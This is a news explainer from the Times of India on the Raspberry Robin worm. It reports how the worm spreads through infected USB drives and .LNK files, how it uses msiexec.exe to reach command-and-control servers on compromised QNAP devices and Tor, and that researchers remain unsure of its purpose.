Explained: How a ‘Windows worm’ spread across corporate networks through USB drives – Times of India
Microsoft has recently discovered a malicious “Windows worm” that has already spread its claws into several corporate networks. According to a report by TechRadar, the software giant has quietly notified its findings to the companies subscribed to Microsoft Defender for Endpoint. Meanwhile, the company’s security research team has explained that this malware, named Raspberry Robin, has not yet been used. However, “it has been observed connecting to multiple addresses on the Tor network.”
What is Raspberry Robin
In 2021, the researchers from Red Canary discovered a “cluster of malicious activity” and identified the Raspberry Robin malware for the first time, the report states. As per the report, the malware is “usually distributed offline,” through compromised USB drives. Moreover, the researchers have also studied an infected drive to discover that the worm is spread to new devices through a “malicious .LNK file.”
How did the malware spread
As the infected USB drives are connected to a new device, the worm triggers a new process through cmd.exe and runs the file on the compromised endpoint. Moreover, the researchers have also mentioned that the worm uses Microsoft Standard Installer (msiexec.exe) to contact its command and control (C2) server, the report claims. As per speculations, the server is “hosted on a compromised QNAP NAS device” where TOR exit nodes are being used as additional C2 infrastructure. In 2021, cybersecurity experts at Sekoia also observed this worm using QNAP NAS devices as C2 servers.
The report states, “While msiexec.exe downloads and executes legitimate installer packages, adversaries also leverage it to deliver malware. Raspberry Robin uses msiexec.exe to attempt external network communication to a malicious domain for C2 purposes.”
How is the malware being used
As per the report, researchers haven’t been able to link the malware to a specific threat actor. Moreover, they are not even sure about the intentions of the malware as it’s not being actively used, the report suggests. Meanwhile, a researcher also recently said, “We also don’t know why Raspberry Robin installs a malicious DLL.”
One of the theories can be the malware’s attempt “to establish persistence on an infected system.” However, this is just a hypothesis which is not proven yet and more information is required to build confidence in this theory, the report claims.
FacebookTwitterInstagramKOO APPYOUTUBE
For all the latest Technology News Click Here